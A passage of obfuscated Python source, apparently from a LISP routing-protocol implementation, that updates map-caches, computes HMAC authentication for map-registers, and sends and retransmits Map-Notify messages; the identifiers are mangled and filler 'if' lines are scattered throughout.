if 99 - 99: Oo0Ooo - OoO0O00 + OoooooooOO - I1Ii111 - I1ii11iIi11i % i1IIi
if 49 - 49: IiII % OoooooooOO / Oo0Ooo - OoOoOO00 + o0oOOo0O0Ooo / Ii1I
if 6 - 6: I11i % IiII
if ( I1II . json ) :
if ( lisp_is_json_telemetry ( I1II . json . json_string ) ) :
iI = I1II . json . json_string
iI = lisp_encode_telemetry ( iI , ii = itr_in_ts )
I1II . json . json_string = iI
if 48 - 48: Ii1I
if 100 - 100: OoO0O00 % I1Ii111 + OoooooooOO / OoO0O00
if 62 - 62: IiII
if 66 - 66: o0oOOo0O0Ooo % OOooOOo
if 15 - 15: Ii1I % IiII + IiII % iII111i - O0 * OoooooooOO
if 53 - 53: OoOoOO00 . Ii1I / Oo0Ooo
if 62 - 62: i11iIiiIii
if 38 - 38: I1ii11iIi11i % ooOoO0o * OoooooooOO + iIii1I11I1II1 % i1IIi / OOooOOo
if 6 - 6: i11iIiiIii
if 8 - 8: iIii1I11I1II1 + I1ii11iIi11i . i1IIi % OoOoOO00 % OoooooooOO * Oo0Ooo
if ( iI1I1ii . rloc_probe and oOOo . probe_bit ) :
if ( I1II . rloc . afi == source . afi ) :
lisp_process_rloc_probe_reply ( I1II , source , Oo0o ,
iI1I1ii , ttl , I111i11 )
if 53 - 53: oO0o
if ( I1II . rloc . is_multicast_address ( ) ) : I111i11 = I1II
if 23 - 23: I1ii11iIi11i . I1Ii111 + OOooOOo
if 4 - 4: I1IiiI
if 31 - 31: ooOoO0o * i1IIi . O0
if 5 - 5: OOooOOo . I1ii11iIi11i + ooOoO0o . ooOoO0o + iII111i
if 100 - 100: I1Ii111
OoO0oOOooOO . append ( I1II )
if 71 - 71: ooOoO0o * i1IIi / OoOoOO00 * i11iIiiIii - iII111i
if 88 - 88: IiII
if 29 - 29: iII111i . ooOoO0o
if 62 - 62: IiII
if ( lisp_data_plane_security and I1II . rloc_recent_rekey ( ) ) :
o0ii11i1iI1111 = I1II
if 95 - 95: ooOoO0o / i1IIi + II111iiii + OoO0O00 % OoO0O00
if 18 - 18: ooOoO0o * I1IiiI / iII111i % iII111i
if 9 - 9: i11iIiiIii % ooOoO0o % O0 + i1IIi / O0
if 12 - 12: I1Ii111 - iII111i * iII111i + OoO0O00 . Ii1I % I11i
if 28 - 28: ooOoO0o % OoO0O00 - II111iiii * IiII - I1IiiI + I1IiiI
if 84 - 84: IiII / Ii1I
if 39 - 39: OOooOOo - iIii1I11I1II1 + OoOoOO00 % IiII * OoooooooOO % Ii1I
if 11 - 11: I1ii11iIi11i
if 83 - 83: O0
if 97 - 97: O0
if 50 - 50: I1Ii111 / OoooooooOO . o0oOOo0O0Ooo + I1IiiI * i11iIiiIii
if ( iI1I1ii . rloc_probe == False and lisp_nat_traversal ) :
OOO = [ ]
i1ii1iiI1iI1 = [ ]
for I1II in OoO0oOOooOO :
if 85 - 85: iII111i
if 23 - 23: ooOoO0o - OoO0O00 * oO0o / i11iIiiIii * iIii1I11I1II1
if 7 - 7: iIii1I11I1II1 - I1Ii111 . ooOoO0o . O0 - OOooOOo
if 5 - 5: i1IIi * OoOoOO00 + i1IIi % I11i
if 79 - 79: OOooOOo % iIii1I11I1II1 / OoOoOO00
if ( I1II . rloc . is_private_address ( ) ) :
I1II . priority = 1
I1II . state = LISP_RLOC_UNREACH_STATE
OOO . append ( I1II )
i1ii1iiI1iI1 . append ( I1II . rloc . print_address_no_iid ( ) )
continue
if 9 - 9: Ii1I
if 44 - 44: iII111i
if 46 - 46: I11i . i11iIiiIii * OoOoOO00 + o0oOOo0O0Ooo / ooOoO0o
if 37 - 37: OoO0O00 - Ii1I + OoO0O00
if 49 - 49: OoooooooOO - I1ii11iIi11i % I1ii11iIi11i / i1IIi . ooOoO0o
if 60 - 60: Oo0Ooo
if ( I1II . priority == 254 and lisp_i_am_rtr == False ) :
OOO . append ( I1II )
i1ii1iiI1iI1 . append ( I1II . rloc . print_address_no_iid ( ) )
if 46 - 46: OoOoOO00 + i1IIi
if ( I1II . priority != 254 and lisp_i_am_rtr ) :
OOO . append ( I1II )
i1ii1iiI1iI1 . append ( I1II . rloc . print_address_no_iid ( ) )
if 43 - 43: II111iiii * IiII % iIii1I11I1II1 % i11iIiiIii % I1ii11iIi11i
if 81 - 81: oO0o % I1ii11iIi11i % ooOoO0o * O0 - OOooOOo
if 17 - 17: O0 % O0 / I1ii11iIi11i . Oo0Ooo . iII111i
if ( i1ii1iiI1iI1 != [ ] ) :
OoO0oOOooOO = OOO
lprint ( "NAT-traversal optimized RLOC-set: {}" . format ( i1ii1iiI1iI1 ) )
if 4 - 4: OoO0O00
if 65 - 65: Oo0Ooo % O0 / I1Ii111 * IiII - oO0o
if 32 - 32: Ii1I * OoO0O00 + ooOoO0o
if 41 - 41: IiII + I11i * ooOoO0o + Oo0Ooo . ooOoO0o
if 38 - 38: iII111i * OoooooooOO - IiII
if 36 - 36: I1Ii111 * II111iiii + I1ii11iIi11i - iII111i * iII111i
if 91 - 91: O0 + I1Ii111 * II111iiii - O0 . i11iIiiIii . Oo0Ooo
OOO = [ ]
for I1II in OoO0oOOooOO :
if ( I1II . json != None ) : continue
OOO . append ( I1II )
if 54 - 54: ooOoO0o * I11i / I1ii11iIi11i % ooOoO0o
if ( OOO != [ ] ) :
I1I1 = len ( OoO0oOOooOO ) - len ( OOO )
lprint ( "Pruning {} no-address RLOC-records for map-cache" . format ( I1I1 ) )
if 76 - 76: I11i . I1IiiI
OoO0oOOooOO = OOO
if 66 - 66: oO0o % oO0o * IiII
if 39 - 39: i1IIi * Ii1I + OoOoOO00 / oO0o
if 6 - 6: I1ii11iIi11i / II111iiii / OoOoOO00 . i11iIiiIii - iII111i
if 43 - 43: i11iIiiIii * i11iIiiIii * I1Ii111
if 80 - 80: oO0o . I1IiiI * II111iiii + o0oOOo0O0Ooo / o0oOOo0O0Ooo % OoooooooOO
if 31 - 31: o0oOOo0O0Ooo - OoO0O00 % I1IiiI
if 23 - 23: OOooOOo
if 97 - 97: Oo0Ooo / OoooooooOO . OoooooooOO
if ( iI1I1ii . rloc_probe and o0oO0o00 != None ) : OoO0oOOooOO = o0oO0o00 . rloc_set
if 47 - 47: OoO0O00
if 52 - 52: I1IiiI * iIii1I11I1II1 % oO0o * IiII % oO0o
if 9 - 9: I11i
if 83 - 83: i11iIiiIii
if 72 - 72: oO0o + II111iiii . O0 * oO0o + iII111i
I1i1I1I = oOOo00Oo00OO0
if ( o0oO0o00 and OoO0oOOooOO != o0oO0o00 . rloc_set ) :
o0oO0o00 . delete_rlocs_from_rloc_probe_list ( )
I1i1I1I = True
if 45 - 45: i1IIi * OoooooooOO - IiII + oO0o
if 38 - 38: OoO0O00
if 42 - 42: O0
if 31 - 31: OoOoOO00 . II111iiii - oO0o . iII111i - I1ii11iIi11i
if 90 - 90: OoooooooOO / ooOoO0o / I1IiiI
o0o00 = o0oO0o00 . uptime if ( o0oO0o00 ) else None
if ( o0oO0o00 == None ) :
o0oO0o00 = lisp_mapping ( oO000oOoO0 . eid , oO000oOoO0 . group , OoO0oOOooOO )
o0oO0o00 . mapping_source = source
if 28 - 28: iIii1I11I1II1 - o0oOOo0O0Ooo . iIii1I11I1II1 / I11i / I1Ii111 % iIii1I11I1II1
if 45 - 45: OoO0O00 + ooOoO0o / iIii1I11I1II1 % i11iIiiIii
if 16 - 16: i1IIi / oO0o - OOooOOo / Ii1I + I1IiiI
if 62 - 62: i11iIiiIii . Ii1I . iII111i / I1Ii111 * OoO0O00
if 31 - 31: OoOoOO00
if 16 - 16: OoooooooOO
if ( lisp_i_am_rtr and oO000oOoO0 . group . is_null ( ) == False ) :
o0oO0o00 . map_cache_ttl = LISP_MCAST_TTL
else :
o0oO0o00 . map_cache_ttl = oO000oOoO0 . store_ttl ( )
if 32 - 32: ooOoO0o - o0oOOo0O0Ooo / ooOoO0o + o0oOOo0O0Ooo + iII111i
o0oO0o00 . action = oO000oOoO0 . action
o0oO0o00 . add_cache ( I1i1I1I )
if 78 - 78: OoooooooOO . I1ii11iIi11i * oO0o . o0oOOo0O0Ooo * OoOoOO00 / oO0o
if 47 - 47: OOooOOo
iI1I11II = "Add"
if ( o0o00 ) :
o0oO0o00 . uptime = o0o00
o0oO0o00 . refresh_time = lisp_get_timestamp ( )
iI1I11II = "Replace"
if 99 - 99: O0 - OoO0O00
if 95 - 95: Ii1I . IiII * o0oOOo0O0Ooo
lprint ( "{} {} map-cache with {} RLOCs" . format ( iI1I11II ,
green ( o0oO0o00 . print_eid_tuple ( ) , False ) , len ( OoO0oOOooOO ) ) )
if 91 - 91: I1Ii111
if 49 - 49: I11i
if 17 - 17: Oo0Ooo % o0oOOo0O0Ooo
if 3 - 3: OoO0O00 . oO0o . oO0o . Ii1I
if 100 - 100: i11iIiiIii / i1IIi . I1ii11iIi11i
if ( lisp_ipc_dp_socket and o0ii11i1iI1111 != None ) :
lisp_write_ipc_keys ( o0ii11i1iI1111 )
if 1 - 1: IiII * I1Ii111 / I1ii11iIi11i * i11iIiiIii
if 82 - 82: o0oOOo0O0Ooo * OoO0O00 / o0oOOo0O0Ooo % OoOoOO00 * iIii1I11I1II1 % O0
if 10 - 10: ooOoO0o
if 69 - 69: I11i + I1IiiI / oO0o
if 89 - 89: i1IIi % OoOoOO00 . I1ii11iIi11i
if 85 - 85: I1Ii111 - oO0o
if 34 - 34: iIii1I11I1II1 / IiII + OoOoOO00 - IiII / ooOoO0o + OoOoOO00
if ( oOOo00Oo00OO0 ) :
oO0oo000O = bold ( "RLOC-probe" , False )
for I1II in o0oO0o00 . best_rloc_set :
oo0o00OO = red ( I1II . rloc . print_address_no_iid ( ) , False )
lprint ( "Trigger {} to {}" . format ( oO0oo000O , oo0o00OO ) )
lisp_send_map_request ( lisp_sockets , 0 , o0oO0o00 . eid , o0oO0o00 . group , I1II )
if 14 - 14: ooOoO0o - OoooooooOO / iIii1I11I1II1
if 98 - 98: i1IIi
if 81 - 81: OoOoOO00 * i11iIiiIii + I1IiiI
return
if 2 - 2: I11i - IiII + I1IiiI % OoO0O00 + iIii1I11I1II1 + oO0o
if 49 - 49: I1IiiI * I1Ii111 . I1IiiI - II111iiii
if 57 - 57: oO0o + O0 - OoOoOO00
if 14 - 14: II111iiii + i11iIiiIii + Ii1I / o0oOOo0O0Ooo . OoO0O00
if 93 - 93: o0oOOo0O0Ooo + i1IIi
if 24 - 24: i1IIi
if 54 - 54: iIii1I11I1II1 - IiII + o0oOOo0O0Ooo + I1ii11iIi11i + IiII
if 99 - 99: Oo0Ooo
def lisp_compute_auth ( packet , map_register , password ) :
if ( map_register . alg_id == LISP_NONE_ALG_ID ) : return ( packet )
if 38 - 38: I1ii11iIi11i - I1IiiI
packet = map_register . zero_auth ( packet )
I1iI1111ii1I1 = lisp_hash_me ( packet , map_register . alg_id , password , False )
if 50 - 50: iII111i % OoO0O00 - oO0o + Oo0Ooo . O0 . iII111i
if 42 - 42: iII111i + I1ii11iIi11i
if 44 - 44: I1ii11iIi11i % IiII
if 1 - 1: Oo0Ooo + IiII - I1Ii111 / I1Ii111
map_register . auth_data = I1iI1111ii1I1
packet = map_register . encode_auth ( packet )
return ( packet )
if 25 - 25: OoOoOO00
if 52 - 52: OOooOOo + IiII
if 73 - 73: OoooooooOO - I1Ii111 % iII111i / OOooOOo . o0oOOo0O0Ooo - IiII
if 69 - 69: Ii1I . iIii1I11I1II1 / Oo0Ooo * Oo0Ooo % IiII
if 5 - 5: OOooOOo - I1Ii111 + IiII
if 82 - 82: OOooOOo
if 26 - 26: ooOoO0o + OoooooooOO + ooOoO0o * I1Ii111
def lisp_hash_me ( packet , alg_id , password , do_hex ) :
if ( alg_id == LISP_NONE_ALG_ID ) : return ( True )
if 26 - 26: I1IiiI - OOooOOo
if ( alg_id == LISP_SHA_1_96_ALG_ID ) :
I1iiiII1i1 = hashlib . sha1
if 2 - 2: IiII % iII111i / o0oOOo0O0Ooo * I11i
if ( alg_id == LISP_SHA_256_128_ALG_ID ) :
I1iiiII1i1 = hashlib . sha256
if 35 - 35: OoOoOO00 * I1Ii111 / II111iiii / O0
if 35 - 35: ooOoO0o * I11i
if ( do_hex ) :
I1iI1111ii1I1 = hmac . new ( password , packet , I1iiiII1i1 ) . hexdigest ( )
else :
I1iI1111ii1I1 = hmac . new ( password , packet , I1iiiII1i1 ) . digest ( )
if 85 - 85: i1IIi
return ( I1iI1111ii1I1 )
if 81 - 81: I1Ii111
if 28 - 28: i1IIi * ooOoO0o
if 14 - 14: II111iiii + II111iiii - I11i / I11i . OoOoOO00 + OoO0O00
if 92 - 92: II111iiii - II111iiii % IiII
if 48 - 48: oO0o / II111iiii + oO0o
if 16 - 16: o0oOOo0O0Ooo % II111iiii - i11iIiiIii - IiII + O0 - i11iIiiIii
if 58 - 58: OoooooooOO / I1ii11iIi11i - Oo0Ooo / II111iiii
if 13 - 13: o0oOOo0O0Ooo + OoOoOO00 * ooOoO0o % IiII
def lisp_verify_auth ( packet , alg_id , auth_data , password ) :
if ( alg_id == LISP_NONE_ALG_ID ) : return ( True )
if 18 - 18: I1IiiI . I1ii11iIi11i + Oo0Ooo - iII111i
I1iI1111ii1I1 = lisp_hash_me ( packet , alg_id , password , True )
o00Oo = ( I1iI1111ii1I1 == auth_data )
if 15 - 15: I1Ii111 / I11i / i11iIiiIii + OoO0O00 % OOooOOo
if 8 - 8: oO0o - I1IiiI / I11i + II111iiii - I1IiiI
if 3 - 3: I11i * o0oOOo0O0Ooo . O0
if 11 - 11: Oo0Ooo
if ( o00Oo == False ) :
lprint ( "Hashed value: {} does not match packet value: {}" . format ( I1iI1111ii1I1 , auth_data ) )
if 64 - 64: OOooOOo
if 8 - 8: ooOoO0o % o0oOOo0O0Ooo
return ( o00Oo )
if 22 - 22: O0 * IiII . OoO0O00
if 63 - 63: oO0o % Oo0Ooo * OoO0O00 / II111iiii / Ii1I - ooOoO0o
if 14 - 14: ooOoO0o . o0oOOo0O0Ooo + II111iiii
if 50 - 50: Ii1I - i1IIi * oO0o
if 52 - 52: I11i / oO0o - oO0o
if 84 - 84: iIii1I11I1II1 - o0oOOo0O0Ooo
if 37 - 37: iII111i * o0oOOo0O0Ooo
def lisp_retransmit_map_notify ( map_notify ) :
Ii1II1I11i1I = map_notify . etr
Oo0o = map_notify . etr_port
if 23 - 23: ooOoO0o + OoooooooOO * iII111i . I11i
if 2 - 2: iIii1I11I1II1 * I1ii11iIi11i - OoooooooOO
if 93 - 93: iII111i % ooOoO0o * Oo0Ooo
if 34 - 34: O0 * oO0o
if 58 - 58: OOooOOo . iII111i - Oo0Ooo / iII111i . I11i
if ( map_notify . retry_count == LISP_MAX_MAP_NOTIFY_RETRIES ) :
lprint ( "Map-Notify with nonce 0x{} retry limit reached for ETR {}" . format ( map_notify . nonce_key , red ( Ii1II1I11i1I . print_address ( ) , False ) ) )
if 86 - 86: iIii1I11I1II1 - iII111i % Ii1I
if 18 - 18: oO0o / IiII - OOooOOo % Ii1I
o0Oo = map_notify . nonce_key
if ( lisp_map_notify_queue . has_key ( o0Oo ) ) :
map_notify . retransmit_timer . cancel ( )
lprint ( "Dequeue Map-Notify from retransmit queue, key is: {}" . format ( o0Oo ) )
if 88 - 88: i11iIiiIii
try :
lisp_map_notify_queue . pop ( o0Oo )
except :
lprint ( "Key not found in Map-Notify queue" )
if 13 - 13: I1IiiI
if 52 - 52: Ii1I * oO0o / I1Ii111 . IiII
return
if 84 - 84: OoooooooOO - oO0o - I1Ii111
if 69 - 69: OoOoOO00 * Ii1I % OoooooooOO % OOooOOo * OoOoOO00
OOOooo0 = map_notify . lisp_sockets
map_notify . retry_count += 1
if 20 - 20: IiII
lprint ( "Retransmit {} with nonce 0x{} to xTR {}, retry {}" . format ( bold ( "Map-Notify" , False ) , map_notify . nonce_key ,
# II111iiii
red ( Ii1II1I11i1I . print_address ( ) , False ) , map_notify . retry_count ) )
if 80 - 80: OOooOOo . OoO0O00 + O0 / IiII
lisp_send_map_notify ( OOOooo0 , map_notify . packet , Ii1II1I11i1I , Oo0o )
if ( map_notify . site ) : map_notify . site . map_notifies_sent += 1
if 30 - 30: Ii1I / I11i . II111iiii + ooOoO0o
if 58 - 58: Oo0Ooo % OOooOOo - i11iIiiIii - I1Ii111 - Ii1I % OoO0O00
if 67 - 67: I1Ii111 + OoO0O00 - oO0o / OOooOOo . OoooooooOO * O0
if 91 - 91: O0 * OoOoOO00 - OoOoOO00 * II111iiii - iII111i
map_notify . retransmit_timer = threading . Timer ( LISP_MAP_NOTIFY_INTERVAL ,
lisp_retransmit_map_notify , [ map_notify ] )
map_notify . retransmit_timer . start ( )
return
if 38 - 38: oO0o * I11i % OOooOOo
if 80 - 80: O0 % II111iiii / O0 . Oo0Ooo * OoOoOO00 + OOooOOo
if 47 - 47: Ii1I - Oo0Ooo * OoOoOO00
if 20 - 20: oO0o
if 48 - 48: I1IiiI % OoO0O00
if 33 - 33: Ii1I
if 73 - 73: Ii1I . IiII
def lisp_send_merged_map_notify ( lisp_sockets , parent , map_register ,
eid_record ) :
if 43 - 43: I11i . IiII - iII111i * I1IiiI * iII111i
if 90 - 90: i11iIiiIii * i1IIi
if 88 - 88: i11iIiiIii - OoOoOO00
if 53 - 53: iIii1I11I1II1 % I1Ii111 / Oo0Ooo % Oo0Ooo
eid_record . rloc_count = len ( parent . registered_rlocs )
iIiIi1IiiiI1 = eid_record . encode ( )
eid_record . print_record ( "Merged Map-Notify " , False )
if 64 - 64: OoO0O00 + I1ii11iIi11i / OoO0O00 * I1Ii111 . Oo0Ooo
if 5 - 5: iII111i - iIii1I11I1II1 * IiII
if 52 - 52: OOooOOo
if 50 - 50: OoOoOO00 % o0oOOo0O0Ooo - II111iiii - i1IIi
for iI11IiI1 in parent . registered_rlocs :
oOOo = lisp_rloc_record ( )
oOOo . store_rloc_entry ( iI11IiI1 )
iIiIi1IiiiI1 += oOOo . encode ( )
oOOo . print_record ( " " )
del ( oOOo )
if 24 - 24: I1ii11iIi11i * IiII + iII111i / Oo0Ooo - ooOoO0o . IiII
if 81 - 81: OoooooooOO + OOooOOo
if 7 - 7: I11i + ooOoO0o
if 28 - 28: OoooooooOO * iII111i / oO0o / iII111i
if 80 - 80: OoO0O00 - I1IiiI + OOooOOo - iII111i / i1IIi
for iI11IiI1 in parent . registered_rlocs :
Ii1II1I11i1I = iI11IiI1 . rloc
Ii1ii1 = lisp_map_notify ( lisp_sockets )
Ii1ii1 . record_count = 1
o00oO = map_register . key_id
Ii1ii1 . key_id = o00oO
Ii1ii1 . alg_id = map_register . alg_id
Ii1ii1 . auth_len = map_register . auth_len
Ii1ii1 . nonce = map_register . nonce
Ii1ii1 . nonce_key = lisp_hex_string ( Ii1ii1 . nonce )
Ii1ii1 . etr . copy_address ( Ii1II1I11i1I )
Ii1ii1 . etr_port = map_register . sport
Ii1ii1 . site = parent . site
IiiiIi1iiii11 = Ii1ii1 . encode ( iIiIi1IiiiI1 , parent . site . auth_key [ o00oO ] )
Ii1ii1 . print_notify ( )
if 83 - 83: iIii1I11I1II1
if 73 - 73: I1ii11iIi11i + II111iiii . i11iIiiIii + I1IiiI + I1ii11iIi11i
if 6 - 6: O0 % Ii1I . oO0o
if 91 - 91: O0 - oO0o * O0
o0Oo = Ii1ii1 . nonce_key
if ( lisp_map_notify_queue . has_key ( o0Oo ) ) :
oOoO0O0O0O0 = lisp_map_notify_queue [ o0Oo ]
oOoO0O0O0O0 . retransmit_timer . cancel ( )
del ( oOoO0O0O0O0 )
if 84 - 84: IiII . OoO0O00
lisp_map_notify_queue [ o0Oo ] = Ii1ii1
if 73 - 73: OoOoOO00
if 47 - 47: oO0o
if 17 - 17: IiII
if 47 - 47: I11i . I1IiiI % ooOoO0o . i11iIiiIii
lprint ( "Send merged Map-Notify to ETR {}" . format ( red ( Ii1II1I11i1I . print_address ( ) , False ) ) )
if 63 - 63: I1ii11iIi11i % I11i % OoooooooOO
lisp_send ( lisp_sockets , Ii1II1I11i1I , LISP_CTRL_PORT , IiiiIi1iiii11 )
if 100 - 100: O0
parent . site . map_notifies_sent += 1
if 9 - 9: Ii1I
if 87 - 87: I1IiiI
if 56 - 56: OOooOOo % oO0o - OoOoOO00
if 27 - 27: I1ii11iIi11i - IiII * OoooooooOO * I1ii11iIi11i + i11iIiiIii . IiII
Ii1ii1 . retransmit_timer = threading . Timer ( LISP_MAP_NOTIFY_INTERVAL ,
lisp_retransmit_map_notify , [ Ii1ii1 ] )
Ii1ii1 . retransmit_timer . start ( )
if 81 - 81: oO0o / iIii1I11I1II1
return
if 15 - 15: Ii1I + I1IiiI . OOooOOo / OoooooooOO + I11i - I11i
if 27 - 27: Ii1I / o0oOOo0O0Ooo . iIii1I11I1II1 . I1IiiI - OoO0O00
if 28 - 28: ooOoO0o
if 88 - 88: oO0o
if 77 - 77: ooOoO0o + I1Ii111 . OoOoOO00
if 2 - 2: i1IIi - IiII + iIii1I11I1II1 % i1IIi * II111iiii
if 26 - 26: I11i
def lisp_build_map_notify ( lisp_sockets , eid_records , eid_list , record_count ,
source , port , nonce , key_id , alg_id , auth_len , site , map_register_ack ) :
if 57 - 57: I1ii11iIi11i + I1Ii111 + i11iIiiIii . i1IIi / i11iIiiIii
o0Oo = lisp_hex_string ( nonce ) + source . print_address ( )
if 43 - 43: Ii1I % I11i
if 5 - 5: OoooooooOO % i11iIiiIii * o0oOOo0O0Ooo * OoooooooOO - o0oOOo0O0Ooo % I11i
if 58 - 58: i11iIiiIii % Ii1I + Oo0Ooo - OoOoOO00 - i11iIiiIii / O0
if 36 - 36: OOooOOo
if 42 - 42: OOooOOo * ooOoO0o * i11iIiiIii + OoooooooOO . iIii1I11I1II1
if 95 - 95: i1IIi * O0 / II111iiii * OoOoOO00 * I1IiiI
lisp_remove_eid_from_map_notify_queue ( eid_list )
if ( lisp_map_notify_queue . has_key ( o0Oo ) ) :
Ii1ii1 = lisp_map_notify_queue [ o0Oo ]
OO0o0OO0 = red ( source . print_address_no_iid ( ) , False )
lprint ( "Map-Notify with nonce 0x{} pending for xTR {}" . format ( lisp_hex_string ( Ii1ii1 . nonce ) , OO0o0OO0 ) )
if 38 - 38: OOooOOo - OoOoOO00 / OoO0O00 / o0oOOo0O0Ooo - i11iIiiIii
return
if 4 - 4: I1IiiI * o0oOOo0O0Ooo - I11i - OoooooooOO . OoooooooOO
if 79 - 79: oO0o - iII111i
Ii1ii1 = lisp_map_notify ( lisp_sockets )
Ii1ii1 . record_count = record_count
key_id = key_id
Ii1ii1 . key_id = key_id
Ii1ii1 . alg_id = alg_id
Ii1ii1 . auth_len = auth_len
Ii1ii1 . nonce = nonce
Ii1ii1 . nonce_key = lisp_hex_string ( nonce )
Ii1ii1 . etr . copy_address ( source )
Ii1ii1 . etr_port = port
Ii1ii1 . site = site
Ii1ii1 . eid_list = eid_list
if 34 - 34: OoooooooOO + Ii1I - iII111i + OoooooooOO / I1IiiI
if 39 - 39: o0oOOo0O0Ooo . i1IIi * OoO0O00 / II111iiii / I1ii11iIi11i * OOooOOo
if 39 - 39: O0 . OOooOOo
if 95 - 95: I11i
if ( map_register_ack == False ) :
o0Oo = Ii1ii1 . nonce_key
lisp_map_notify_queue [ o0Oo ] = Ii1ii1
if 58 - 58: I1ii11iIi11i / i11iIiiIii + iII111i + I11i / oO0o
if 8 - 8: I1ii11iIi11i
if ( map_register_ack ) :
lprint ( "Send Map-Notify to ack Map-Register" )
else :
lprint ( "Send Map-Notify for RLOC-set change" )
if 100 - 100: OoooooooOO / I11i - Ii1I
if 11 - 11: OoO0O00
if 20 - 20: Oo0Ooo
if 34 - 34: I1Ii111 % i11iIiiIii / oO0o - i1IIi . o0oOOo0O0Ooo / oO0o
if 68 - 68: I1Ii111 % Ii1I * Oo0Ooo - O0 . IiII
IiiiIi1iiii11 = Ii1ii1 . encode ( eid_records , site . auth_key [ key_id ] )
Ii1ii1 . print_notify ( )
if 1 - 1: I1ii11iIi11i
if ( map_register_ack == False ) :
oO000oOoO0 = lisp_eid_record ( )
oO000oOoO0 . decode ( eid_records )
oO000oOoO0 . print_record ( " " , False )
if 18 - 18: i11iIiiIii % OoO0O00 % OOooOOo . OOooOOo * Ii1I / II111iiii
if 81 - 81: iII111i % IiII / I11i
if 50 - 50: IiII + i1IIi % I1Ii111
if 72 - 72: I1Ii111
if 6 - 6: II111iiii - i1IIi
lisp_send_map_notify ( lisp_sockets , IiiiIi1iiii11 , Ii1ii1 . etr , port )
site . map_notifies_sent += 1
if 78 - 78: OoOoOO00 - Oo0Ooo * II111iiii % iIii1I11I1II1 . i11iIiiIii % iII111i
if ( map_register_ack ) : return
if 85 - 85: I1ii11iIi11i + OOooOOo % i1IIi
if 13 - 13: OOooOOo + i11iIiiIii / OOooOOo . O0 . OoO0O00 - Ii1I
if 31 - 31: OoOoOO00 * o0oOOo0O0Ooo / O0 . iII111i / i11iIiiIii
if 22 - 22: I1IiiI . OoooooooOO * I1ii11iIi11i + i11iIiiIii - O0 + i11iIiiIii
if 98 - 98: OOooOOo + I1IiiI / IiII / OoooooooOO / OOooOOo
if 8 - 8: OoooooooOO * OOooOOo * iII111i - iII111i
Ii1ii1 . retransmit_timer = threading . Timer ( LISP_MAP_NOTIFY_INTERVAL ,
lisp_retransmit_map_notify , [ Ii1ii1 ] )
Ii1ii1 . retransmit_timer . start ( )
return
if 32 - 32: I1Ii111
if 28 - 28: I11i . i11iIiiIii % iIii1I11I1II1 + OoOoOO00
if 4 - 4: OOooOOo + I1ii11iIi11i - iII111i + OOooOOo / IiII
if 23 - 23: iIii1I11I1II1 + OoooooooOO + ooOoO0o . iII111i . Oo0Ooo - iIii1I11I1II1
if 25 - 25: O0 + I1IiiI % OOooOOo / Oo0Ooo . IiII / I1Ii111
if 84 - 84: ooOoO0o . O0 + I1IiiI * OoO0O00 - I1IiiI
if 24 - 24: Ii1I
if 23 - 23: Oo0Ooo * i1IIi / I1IiiI . I11i - I1ii11iIi11i . iIii1I11I1II1
def lisp_send_map_notify_ack ( lisp_sockets , eid_records , map_notify , ms ) :
map_notify . map_notify_ack = True
if 15 - 15: O0 + o0oOOo0O0Ooo / oO0o
if 27 - 27: Ii1I * II111iiii / oO0o
if 99 - 99: I11i + ooOoO0o % I11i + O0 - Ii1I - I1Ii111
if 3 - 3: Oo0Ooo . I1IiiI
IiiiIi1iiii11 = map_notify . encode ( eid_records , ms . password )
map_notify . print_notify ( )
if 61 - 61: OoO0O00 - I1ii11iIi11i . Ii1I * i11iIiiIii
if 97 - 97: ooOoO0o
if 58 - 58: iII111i
if 47 - 47: II111iiii % Oo0Ooo . iIii1I11I1II1 . oO0o
Ii1II1I11i1I = ms . map_server
lprint ( "Send Map-Notify-Ack to {}" . format (
red ( Ii1II1I11i1I . print_address ( ) , False ) ) )
lisp_send ( lisp_sockets , Ii1II1I11i1I , LISP_CTRL_PORT , IiiiIi1iiii11 )
return
if 52 - 52: I11i * I1IiiI % I11i - iII111i - Ii1I - OoooooooOO
if 15 - 15: iII111i
if 95 - 95: i11iIiiIii . Ii1I / II111iiii + II111iiii + Ii1I / I11i
if 72 - 72: I1Ii111 . I1Ii111 * O0 + I1ii11iIi11i / Oo0Ooo
if 96 - 96: oO0o . ooOoO0o * Oo0Ooo % ooOoO0o + I1Ii111 + iIii1I11I1II1
if 45 - 45: II111iiii
if 42 - 42: ooOoO0o
if 62 - 62: II111iiii * o0oOOo0O0Ooo . OoO0O00 / II111iiii
def lisp_send_multicast_map_notify ( lisp_sockets , site_eid , eid_list , xtr ) :
if 5 - 5: OoO0O00 + O0 . OoooooooOO + I1IiiI + i1IIi * OOooOOo
Ii1ii1 = lisp_map_notify ( lisp_sockets )
Ii1ii1 . record_count = 1
Ii1ii1 . nonce = lisp_get_control_nonce ( )
Ii1ii1 . nonce_key = lisp_hex_string ( Ii1ii1 . nonce )
Ii1ii1 . etr . copy_address ( xtr )
Ii1ii1 . etr_port = LISP_CTRL_PORT
Ii1ii1 . eid_list = eid_list
o0Oo = Ii1ii1 . nonce_key
if 19 - 19: OoooooooOO + i11iIiiIii / II111iiii - Oo0Ooo . OOooOOo
if 10 - 10: oO0o * Oo0Ooo
if 55 - 55: OoO0O00 - i1IIi - I11i * oO0o
if 91 - 91: I1Ii111
if 77 - 77: I1ii11iIi11i . ooOoO0o - iIii1I11I1II1 + Ii1I % II111iiii * II111iiii
if 41 - 41: II111iiii + Oo0Ooo - IiII / I1Ii111 - OOooOOo . oO0o
lisp_remove_eid_from_map_notify_queue ( Ii1ii1 . eid_list )
if ( lisp_map_notify_queue . has_key ( o0Oo ) ) :
Ii1ii1 = lisp_map_notify_queue [ o0Oo ]
lprint ( "Map-Notify with nonce 0x{} pending for ITR {}" . format ( Ii1ii1 . nonce , red ( xtr . print_address_no_iid ( ) , False ) ) )
if 100 - 100: ooOoO0o / I1ii11iIi11i * OoOoOO00 . I1ii11iIi11i . o0oOOo0O0Ooo * iIii1I11I1II1
return
if 15 - 15: iII111i + o0oOOo0O0Ooo / IiII
if 33 - 33: OoooooooOO . IiII * o0oOOo0O0Ooo
if 41 - 41: Ii1I . iII111i . o0oOOo0O0Ooo % OoooooooOO % IiII
if 81 - 81: IiII * i11iIiiIii + i1IIi + OOooOOo . i1IIi
if 6 - 6: i11iIiiIii - oO0o % OoO0O00 + iIii1I11I1II1
lisp_map_notify_queue [ o0Oo ] = Ii1ii1
if 69 - 69: IiII
if 13 - 13: i11iIiiIii
if 49 - 49: OoOoOO00
if 61 - 61: I1Ii111 / I1Ii111 / iII111i / ooOoO0o - I1IiiI . o0oOOo0O0Ooo
ooo0O0OO = site_eid . rtrs_in_rloc_set ( )
if ( ooo0O0OO ) :
